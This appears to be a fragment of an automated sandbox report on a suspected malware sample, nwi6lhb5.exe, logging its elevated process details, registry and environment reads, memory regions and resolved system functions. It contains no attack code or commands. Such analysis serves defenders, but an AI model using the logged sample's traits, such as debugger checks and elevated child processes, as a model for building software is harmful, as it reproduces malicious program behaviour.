| Read | - | size = 52736, size_out = 52736 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 27 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 232, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\windows\syswow64\cmd.exe | type = PROCESS_PAGE_PRIORITY |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 |
Process #5: nwi6lhb5.exe
543
2
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\ciihmnxmn6ps\desktop\nwi6lhb5.exe |
| Command Line | "C:\Users\CIiHmnxMn6Ps\Desktop\NWI6lHB5.exe" -n |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:00:49, Reason: Child Process |
| Unmonitor | End Time: 00:03:38, Reason: Self Terminated |
| Monitor Duration | 00:02:49 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe7c |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E80
0x
E98
0x
EA8
0x
EAC
0x
EB0
0x
EB4
0x
EB8
0x
EBC
0x
EC0
0x
EC4
0x
EC8
0x
ECC
0x
ED0
0x
ED4
0x
ED8
0x
EDC
0x
EE4
0x
EE8
0x
EEC
0x
EF0
0x
EF4
0x
EF8
0x
EFC
0x
F00
0x
F04
0x
F10
0x
F14
0x
F18
0x
F1C
0x
F20
0x
F24
0x
F28
0x
F2C
0x
F30
0x
F34
0x
F38
0x
F3C
0x
F40
0x
F44
0x
F48
0x
F4C
0x
F50
0x
F54
0x
F58
0x
F5C
0x
F60
0x
F64
0x
F68
0x
F6C
0x
F70
0x
F74
0x
F78
0x
F7C
0x
F80
0x
F84
0x
F88
0x
F8C
0x
F90
0x
F94
0x
F98
0x
F9C
0x
FA0
0x
FA4
0x
FA8
0x
FAC
0x
FB0
0x
CF0
0x
CD8
0x
AEC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002a3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| nwi6lhb5.exe | 0x00400000 | 0x00a77fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x0000000000a80000 | 0x00a80000 | 0x00c07fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c20000 | 0x00c20000 | 0x00c2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c40000 | 0x00c40000 | 0x00d3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d40000 | 0x00d40000 | 0x00ec0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ed0000 | 0x00ed0000 | 0x022cffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000022d0000 | 0x022d0000 | 0x0240ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02410000 | 0x02746fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002750000 | 0x02750000 | 0x0278ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002790000 | 0x02790000 | 0x0288ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002890000 | 0x02890000 | 0x028cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028d0000 | 0x028d0000 | 0x029cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029d0000 | 0x029d0000 | 0x02a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a10000 | 0x02a10000 | 0x02b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b10000 | 0x02b10000 | 0x02b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b50000 | 0x02b50000 | 0x02c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c50000 | 0x02c50000 | 0x02c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c90000 | 0x02c90000 | 0x02d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d90000 | 0x02d90000 | 0x02dcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002dd0000 | 0x02dd0000 | 0x02ecffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ed0000 | 0x02ed0000 | 0x02f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f10000 | 0x02f10000 | 0x0300ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003010000 | 0x03010000 | 0x0304ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003050000 | 0x03050000 | 0x0314ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003150000 | 0x03150000 | 0x0318ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003190000 | 0x03190000 | 0x0328ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003290000 | 0x03290000 | 0x032cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032d0000 | 0x032d0000 | 0x033cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000033d0000 | 0x033d0000 | 0x0340ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003410000 | 0x03410000 | 0x0350ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003510000 | 0x03510000 | 0x0354ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003550000 | 0x03550000 | 0x0364ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003650000 | 0x03650000 | 0x0368ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003690000 | 0x03690000 | 0x0378ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003790000 | 0x03790000 | 0x037cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000037d0000 | 0x037d0000 | 0x038cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000038d0000 | 0x038d0000 | 0x0390ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003910000 | 0x03910000 | 0x03a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003a10000 | 0x03a10000 | 0x03a4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003a50000 | 0x03a50000 | 0x03b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b50000 | 0x03b50000 | 0x03b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b90000 | 0x03b90000 | 0x03c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c90000 | 0x03c90000 | 0x03ccffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003cd0000 | 0x03cd0000 | 0x03dcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003dd0000 | 0x03dd0000 | 0x03e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003e10000 | 0x03e10000 | 0x03f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f10000 | 0x03f10000 | 0x03f4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f50000 | 0x03f50000 | 0x0404ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004050000 | 0x04050000 | 0x0408ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004090000 | 0x04090000 | 0x0418ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004190000 | 0x04190000 | 0x041cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000041d0000 | 0x041d0000 | 0x042cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000042d0000 | 0x042d0000 | 0x0430ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004310000 | 0x04310000 | 0x0440ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| winrnr.dll | 0x74950000 | 0x7495afff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x74960000 | 0x74972fff | Memory Mapped File | rwx |
|
|
|
- |
| pnrpnsp.dll | 0x74980000 | 0x74995fff | Memory Mapped File | rwx |
|
|
|
- |
| napinsp.dll | 0x749a0000 | 0x749b1fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x749f0000 | 0x749f7fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x74a00000 | 0x74a45fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x74a50000 | 0x74a57fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74a60000 | 0x74a8ffff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x74a90000 | 0x74b13fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x74b20000 | 0x74b6dfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74b70000 | 0x74b8afff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x74b90000 | 0x74b99fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x74ba0000 | 0x74bbbfff | Memory Mapped File | rwx |
|
|
|
- |
| wkscli.dll | 0x74bc0000 | 0x74bcffff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x74bd0000 | 0x74be2fff | Memory Mapped File | rwx |
|
|
|
- |
| wsock32.dll | 0x74bf0000 | 0x74bf7fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x768b0000 | 0x76999fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x769b0000 | 0x76a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76c90000 | 0x76d21fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x773e0000 | 0x773e6fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007fe6e000 | 0x7fe6e000 | 0x7fe70fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe71000 | 0x7fe71000 | 0x7fe73fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe74000 | 0x7fe74000 | 0x7fe76fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe77000 | 0x7fe77000 | 0x7fe79fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe7a000 | 0x7fe7a000 | 0x7fe7cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe7d000 | 0x7fe7d000 | 0x7fe7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe80000 | 0x7fe80000 | 0x7fe82fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe83000 | 0x7fe83000 | 0x7fe85fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe86000 | 0x7fe86000 | 0x7fe88fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe89000 | 0x7fe89000 | 0x7fe8bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe8c000 | 0x7fe8c000 | 0x7fe8efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe8f000 | 0x7fe8f000 | 0x7fe91fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe92000 | 0x7fe92000 | 0x7fe94fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe95000 | 0x7fe95000 | 0x7fe97fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe98000 | 0x7fe98000 | 0x7fe9afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe9b000 | 0x7fe9b000 | 0x7fe9dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe9e000 | 0x7fe9e000 | 0x7fea0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fea1000 | 0x7fea1000 | 0x7fea3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fea4000 | 0x7fea4000 | 0x7fea6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fea7000 | 0x7fea7000 | 0x7fea9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007feaa000 | 0x7feaa000 | 0x7feacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fead000 | 0x7fead000 | 0x7feaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd5000 | 0x7ffd5000 | 0x7ffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 131 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
File (264)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | -n | type = file_attributes |
|
5 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 14 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 15 |
|
9 | |
| Write | STD_OUTPUT_HANDLE | size = 16 |
|
85 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 17 |
|
143 | |
| Write | STD_OUTPUT_HANDLE | size = 34 |
|
9 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 68 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 20 |
|
1 |
Registry (12)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Embarcadero\Locales | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Embarcadero\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\CodeGear\Locales | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\CodeGear\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | - |
|
2 |
Module (118)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x75260000 |
|
1 | |
| Load | ws2_32.dll | base_address = 0x769b0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
8 | |
| Get Handle | c:\windows\syswow64\ntdll.dll | base_address = 0x77ca0000 |
|
8 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x76c90000 |
|
2 | |
| Get Handle | c:\windows\syswow64\advapi32.dll | base_address = 0x76a10000 |
|
1 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x77150000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x768b0000 |
|
2 | |
| Get Handle | c:\windows\syswow64\combase.dll | base_address = 0x76e40000 |
|
1 | |
| Get Handle | c:\windows\syswow64\shell32.dll | base_address = 0x75430000 |
|
1 | |
| Get Handle | c:\windows\syswow64\wsock32.dll | base_address = 0x74bf0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ws2_32.dll | base_address = 0x769b0000 |
|
5 | |
| Get Handle | c:\windows\syswow64\netapi32.dll | base_address = 0x74bd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\srvcli.dll | base_address = 0x74ba0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\netutils.dll | base_address = 0x74b90000 |
|
1 | |
| Get Handle | c:\users\ciihmnxmn6ps\desktop\nwi6lhb5.exe | base_address = 0x400000 |
|
1 | |
| Get Filename | c:\users\ciihmnxmn6ps\desktop\nwi6lhb5.exe | process_name = c:\users\ciihmnxmn6ps\desktop\nwi6lhb5.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\NWI6lHB5.exe, size = 522 |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\nwi6lhb5.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\NWI6lHB5.exe, size = 261 |
|
3 | |
| Get Filename | c:\users\ciihmnxmn6ps\desktop\nwi6lhb5.exe | process_name = c:\users\ciihmnxmn6ps\desktop\nwi6lhb5.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\NWI6lHB5.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadPreferredUILanguages, address_out = 0x752795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadPreferredUILanguages, address_out = 0x75279a20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadUILanguage, address_out = 0x7527d980 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x7527a410 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDiskFreeSpaceExW, address_out = 0x752862d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
2 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantChangeTypeEx, address_out = 0x76ca7e70 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNeg, address_out = 0x76cf0400 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNot, address_out = 0x76cf1670 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAdd, address_out = 0x76cc8460 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarSub, address_out = 0x76cc9960 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMul, address_out = 0x76cc9090 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDiv, address_out = 0x76cf0910 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarIdiv, address_out = 0x76cf12b0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMod, address_out = 0x76cf1510 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAnd, address_out = 0x76cbf9d0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarOr, address_out = 0x76cf1720 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarXor, address_out = 0x76cf18c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCmp, address_out = 0x76cb4040 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarI4FromStr, address_out = 0x76cb4b50 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR4FromStr, address_out = 0x76cbf4c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR8FromStr, address_out = 0x76cc1740 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDateFromStr, address_out = 0x76cb5a80 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCyFromStr, address_out = 0x76cf2e50 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBoolFromStr, address_out = 0x76cb20d0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromCy, address_out = 0x76cb5240 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromDate, address_out = 0x76cb5420 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromBool, address_out = 0x76cb2080 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstanceEx, address_out = 0x76f0baf0 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeEx, address_out = 0x76eacd50 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoAddRefServerProcess, address_out = 0x76f0d120 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoReleaseServerProcess, address_out = 0x76f11970 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoResumeClassObjects, address_out = 0x76f16640 |
|
1 | |
